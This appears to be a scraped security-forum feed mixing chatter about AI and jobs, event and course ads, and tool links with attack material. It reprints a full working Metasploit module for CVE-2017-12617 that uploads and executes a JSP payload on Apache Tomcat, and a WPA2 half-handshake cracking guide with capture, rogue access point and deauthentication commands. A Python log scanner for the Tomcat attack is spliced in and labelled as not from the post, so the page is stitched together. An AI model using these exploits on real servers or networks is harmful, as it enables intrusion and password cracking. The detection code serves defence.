I think that, in theory, if AI developed enough, many IT positions could be replaced. At first, there will be AI doing the "grunt work", and we'll only have to bother with more high-level concepts (until the AI gets there too, and then repeat). Still, maybe (I hope) there will be positive changes overall; maybe it will get people out of the "rat race" and people will have time to be more human and less modern slaves, which might also improve relationships between people. There are many people who don't do anything they like at all, because they spend almost all their time on a job that only helps them survive, and that contributes to many negative things. But a possible downside is that if you have technology that does almost everything for you as a human, many will no longer exercise their cognitive abilities much, thus leading to a decline in intelligence (we reached this level of intelligence as humans precisely by solving the problems we encountered); in other words, the world will get even dumber, which will be a point to exploit for some. Of course, TV and the internet used only for entertainment already do this to many people, but I hope their number doesn't grow too much in the future.
1 point
-
It's good to dream, but with your head screwed on. Who knows what the guy smoked... before he let those things out of his mouth. If he had that much confidence in technology they wouldn't have set about falsifying carbon emissions on millions of cars to fleece many millions of euros. Maybe from his "ivory tower" things seem closer to reality, but he hasn't had the chance to live an ordinary life and see what state a country's infrastructure is in, to see how many people depend on food banks and social assistance, what some "people" are capable of doing to others, etc. In other words, to see human misery in its most depraved and hidden corners. As for... Baboonland, many still crap at the bottom of the yard and drink Mona spirit strained through bread. Add +500 years to any estimate.
1 point
-
The Worldpay Payments & IoT Hackathon is taking place this November 3-5 in Bucharest at the Impact Hub. Participants will receive training on IoT and Worldpay technologies! I can't forget to mention the prize pool worth 13,500 Lei that will be awarded among the winning teams! Here is the media kit
1 point
-
Cyber Security Base with F-Secure is a free course series by the University of Helsinki in collaboration with F-Secure Cyber Security Academy that focuses on building core knowledge and abilities related to the work of a cyber security professional.

About the Course Series

The course series consists of multiple smaller courses, each with a specific theme. Themes include a brief introduction to cyber security, operational security, web software development, types of vulnerabilities typical of web software, discovery and mitigation of such vulnerabilities, and advanced topics such as secure software architectures and cryptography. There will be several case studies as well as projects for participants. At the end of the course series, we'll also organize a friendly competition where participants get to find and fix vulnerabilities within a limited time frame. The course will launch on 31st of October, 2017. More information at: mooc.fi. The material for last year's course is still available here. Leave us your email and we will send you updates about Cyber Security Base with F‑Secure https://cybersecuritybase.github.io/
1 point
-
This Metasploit module uploads a jsp payload and executes it.

##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Tomcat RCE via JSP Upload Bypass',
      'Description'    => %q{
        This module uploads a jsp payload and executes it.
      },
      'Author'         => 'peewpw',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'CVE', '2017-12617' ],
          [ 'URL', 'http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12617' ],
          [ 'URL', 'https://bz.apache.org/bugzilla/show_bug.cgi?id=61542' ]
        ],
      'Privileged'     => false,
      'Platform'       => %w{ linux win }, # others?
      'Targets'        =>
        [
          [ 'Automatic',    { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ],
          [ 'Java Windows', { 'Arch' => ARCH_JAVA, 'Platform' => 'win' } ],
          [ 'Java Linux',   { 'Arch' => ARCH_JAVA, 'Platform' => 'linux' } ]
        ],
      'DisclosureDate' => 'Oct 03 2017',
      'DefaultTarget'  => 0))

    register_options([
      OptString.new('TARGETURI', [true, "The URI path of the Tomcat installation", "/"]),
      Opt::RPORT(8080)
    ])
  end

  def check
    testurl = Rex::Text::rand_text_alpha(10)
    testcontent = Rex::Text::rand_text_alpha(10)

    # The trailing slash is the bypass: the request is no longer routed to the
    # JSP servlet (which refuses PUT), so the default servlet writes the file.
    send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data'   => "<% out.println(\"#{testcontent}\");%>"
    })

    # Requesting the file without the slash runs it as a JSP.
    res1 = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp"),
      'method' => 'GET'
    })

    if res1 && res1.body.include?(testcontent)
      # Remove the test file again (short timeout, result is not needed).
      send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
        'method' => 'DELETE'
      }, 1)
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    print_status("Uploading payload...")
    testurl = Rex::Text::rand_text_alpha(10)

    res = send_request_cgi({
      'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp/"),
      'method' => 'PUT',
      'data'   => payload.encoded
    })

    if res && res.code == 201
      res1 = send_request_cgi({
        'uri'    => normalize_uri(target_uri.path, "#{testurl}.jsp"),
        'method' => 'GET'
      })
      if res1 && res1.code == 200
        print_status("Payload executed!")
      else
        fail_with(Failure::PayloadFailed, "Failed to execute the payload")
      end
    else
      fail_with(Failure::UnexpectedReply, "Failed to upload the payload")
    end
  end
end

# 0day.today [2017-10-13]
Source: 0day.today
1 point
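The request sequence the module relies on (a PUT to a `.jsp/` path with a trailing slash, a GET of the same file, then a DELETE) is also what shows up in Tomcat's access log on a server that was probed or exploited. The scanner below is an added example, not code from the forum post or from the Metasploit module; it assumes Tomcat's "common" AccessLogValve format and the log lines it runs over are constructed.

```python
"""Flag the CVE-2017-12617 request pattern in Tomcat access-log lines.

Added example, not code from the forum post or the Metasploit module. The
module issues PUT "<name>.jsp/" (the trailing slash bypasses the JSP servlet's
PUT restriction), GET "<name>.jsp" to run the payload, then DELETE of the file.
Log format assumed: Tomcat's "common" AccessLogValve, %h %l %u %t "%r" %s %b.
"""
import re
from collections import defaultdict

LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) \S+'
)

# Constructed sample log lines for the demonstration (not from a real server).
SAMPLE_LOG = [
    '10.0.0.5 - - [13/Oct/2017:10:15:32 +0000] "GET /index.jsp HTTP/1.1" 200 1234',
    '203.0.113.9 - - [13/Oct/2017:10:16:01 +0000] "PUT /kQzpLmWxAb.jsp/ HTTP/1.1" 201 -',
    '203.0.113.9 - - [13/Oct/2017:10:16:02 +0000] "GET /kQzpLmWxAb.jsp HTTP/1.1" 200 42',
    '203.0.113.9 - - [13/Oct/2017:10:16:03 +0000] "DELETE /kQzpLmWxAb.jsp/ HTTP/1.1" 204 -',
    '10.0.0.7 - - [13/Oct/2017:10:17:00 +0000] "PUT /docs/notes.txt HTTP/1.1" 201 -',
]

def parse_line(line):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = rec["path"].split("?", 1)[0]  # ignore any query string
    return rec

def scan(lines):
    """Return (kind, host, method, path, status) tuples for suspicious requests.

    "bypass_write": any PUT/DELETE whose path ends in ".jsp/".
    "payload_executed": a 200 GET of a .jsp that the same client had just
    created with a 201 PUT through the bypass.
    """
    findings = []
    uploaded = defaultdict(set)  # host -> .jsp paths it wrote via the bypass
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        host, method, path, status = rec["host"], rec["method"], rec["path"], rec["status"]
        if method in ("PUT", "DELETE") and path.lower().endswith(".jsp/"):
            findings.append(("bypass_write", host, method, path, status))
            if method == "PUT" and status == "201":
                uploaded[host].add(path[:-1])
        elif method == "GET" and status == "200" and path in uploaded[host]:
            findings.append(("payload_executed", host, method, path, status))
    return findings
```

Running `scan(SAMPLE_LOG)` yields one `bypass_write` for the PUT, one `payload_executed` for the GET that followed it, and one `bypass_write` for the DELETE; the ordinary PUT of a `.txt` file is not reported.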
-
Synopsis: Small and highly portable detection tests mapped to the Mitre ATT&CK Framework.
Link: https://github.com/redcanaryco/atomic-red-team (via https://twitter.com/redcanaryco/status/918236402814394368)
1 point
-
Synopsis: PCILeech uses PCIe hardware devices to read and write from the target system memory. This is achieved by using DMA over PCIe. No drivers are needed on the target system.
Link: https://github.com/ufrisk/pcileech/
1 point
-
Your Computer's Hard Drive Can Be Used to Listen to What You're Saying
Link: https://blog.hackster.io/your-computers-hard-drive-can-be-used-to-listen-to-what-you-re-saying-808b83f19f80
1 point
-
OS X Auditor is a free Mac OS X computer forensics tool.

OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:
- the kernel extensions
- the system agents and daemons
- the third party's agents and daemons
- the old and deprecated system and third party's startup items
- the users' agents
- the users' downloaded files
- the installed applications

It extracts:
- the users' quarantined files
- the users' Safari history, downloads, topsites, LastSession, HTML5 databases and localstore
- the users' Firefox cookies, downloads, formhistory, permissions, places and signons
- the users' Chrome history and archives history, cookies, login data, top sites, web data, HTML5 databases and local storage
- the users' social and email accounts
- the WiFi access points the audited system has been connected to (and tries to geolocate them)

It also looks for suspicious keywords in the .plist themselves.

It can verify the reputation of each file on:
- Team Cymru's MHR
- VirusTotal
- your own local database

It can aggregate all logs from the following directories into a zipball:
- /var/log (-> /private/var/log)
- /Library/logs
- the user's ~/Library/logs

Finally, the results can be:
- rendered as a simple txt log file (so you can cat-pipe-grep in them... or just grep)
- rendered as a HTML log file
- sent to a Syslog server

Author
Jean-Philippe Teissier - @Jipe_ & al.

Support
OS X Auditor started as a week-end project and is now barely maintained. It has been forked by the great guys @ Yelp who created osxcollector. If you are looking for a production / corporate solution I do recommend you to move to osxcollector (https://github.com/Yelp/osxcollector)

How to install
Just copy all files from GitHub.

Dependencies
If you plan to run OS X Auditor on a Mac, you will get full plist parsing support with the OS X Foundation through pyobjc:
  pip install pyobjc
If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing:
  pip install biplist
  pip install plist
These dependencies will be removed when a working native plist module is available in python.

How to run
OS X Auditor runs well with python >= 2.7.2 (2.7.9 is OK). It does not run with a different version of python yet (due to the plist nightmare).
OS X Auditor is maintained to work on the latest OS X version. It will do its best on older OS X versions.
You must run it as root (or via sudo) if you want to use it on a running system, otherwise it won't be able to access some system and other users' files.
If you're using API keys from environment variables (see below), you need to use sudo -E to use the user's environment variables.
Type osxauditor.py -h to get all the available options, then run it with the selected options, e.g.
  [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Setting Environment Variables
VirusTotal API:
  export VT_API_KEY=aaaabbbbccccddddeeee

Changelog

Download: OSXAuditor-master.zip or git clone https://github.com/jipegit/OSXAuditor.git
Source: https://github.com/jipegit/OSXAuditor
1 point
-
Hacking Soft Tokens
Advanced Reverse Engineering on Android
Bernhard Mueller
© 2016 Vantage Point Security Pte. Ltd.

Table of Contents
- Introduction
- Mobile One-Time Password Token Overview
  - OATH TOTP
  - Proprietary Algorithms
  - Provisioning
  - Attacks
    - Retrieval from Memory
    - Code Lifting and Instrumentation
- The Android Reverser's Toolbox
  - De-Compilers, Disassemblers and Debuggers
  - Tracing Java Code
  - Tracing Native Code
  - Tracing System Calls
  - Classic Linux Rootkit Style
  - Dynamic Analysis Frameworks
  - Drawbacks Emulation-based Analysis
  - Runtime Instrumentation with Frida
- Building A Sandbox
  - Sandbox Overview
  - Customizing the Kernel
  - Customizing the RAMDisk
  - Booting the Environment
  - Customizing ART
  - Hooking System Calls
  - Automating System Call Hooking with Zork
- Case Studies
  - RSA SecurID: ProGuard and a Proprietary Algorithm
    - Analyzing ProGuard-processed Bytecode
    - Data Storage and Runtime Encryption
    - Tool Time: RSACloneId
    - Vendor Response
    - Summary
  - Vasco DIGIPASS: Advanced Anti-Tampering
    - Initial Analysis
    - Root Detection and Integrity Checks
    - Native Debugging Defenses
    - JDWP Debugging Defenses
    - Static-dynamic Analysis
    - Attack Outline
    - Tool Time: VasClone
    - Vendor Comments
    - Summary
- TL; DR
  - Attack Mitigation
  - Software Protection Effectiveness
- REFERENCES

Download: http://gsec.hitb.org/materials/sg2016/whitepapers/Hacking Soft Tokens - Bernhard Mueller.pdf
1 point
-
WPA2-HalfHandshake-Crack

Conventional WPA2 attacks work by listening for a handshake between client and Access Point. This full four-way handshake is then used in a dictionary attack. This tool is a Proof of Concept to show it is not necessary to have the Access Point present. A person can simply listen for WPA2 probes from any client within range, and then throw up an Access Point with that SSID. Though the authentication will fail, there is enough information in the failed handshake to run a dictionary attack against the failed handshake.

For more information on general wifi hacking, see here

Install
  $ sudo python setup.py install

Sample use
  $ python halfHandshake.py -r sampleHalfHandshake.cap -m 48d224f0d128 -s "no place like 127.0.0.1"
  -r Where to read input pcap file with half handshake (works with full handshakes too)
  -m AP mac address (From the 'fake' access point that was used during the capture)
  -s AP SSID
  -d (optional) Where to read dictionary from

Capturing half handshakes
To listen for device probes the aircrack suite can be used as follows
  sudo airmon-ng start wlan0
  sudo airodump-ng mon0
You should begin to see device probes with BSSID set as (not associated) appearing at the bottom. If WPA2 SSIDs pop up for these probes, these devices can be targeted.
Setup a WPA2 wifi network with an SSID the same as the desired device probe. The passphrase can be anything. In Ubuntu this can be done here http://ubuntuhandbook.org/index.php/2014/09/3-ways-create-wifi-hotspot-ubuntu/
Capture traffic on this interface. In Linux this can be achieved with tcpdump
  sudo tcpdump -i wlan0 -s 65535 -w file.cap
(optional) Deauthenticate clients from nearby WiFi networks to increase probes
If there are not enough unassociated clients, the aircrack suite can be used to deauthenticate clients off nearby networks http://www.aircrack-ng.org/doku.php?id=deauthentication

Source: https://github.com/dxa4481/WPA2-HalfHandshake-Crack
1 point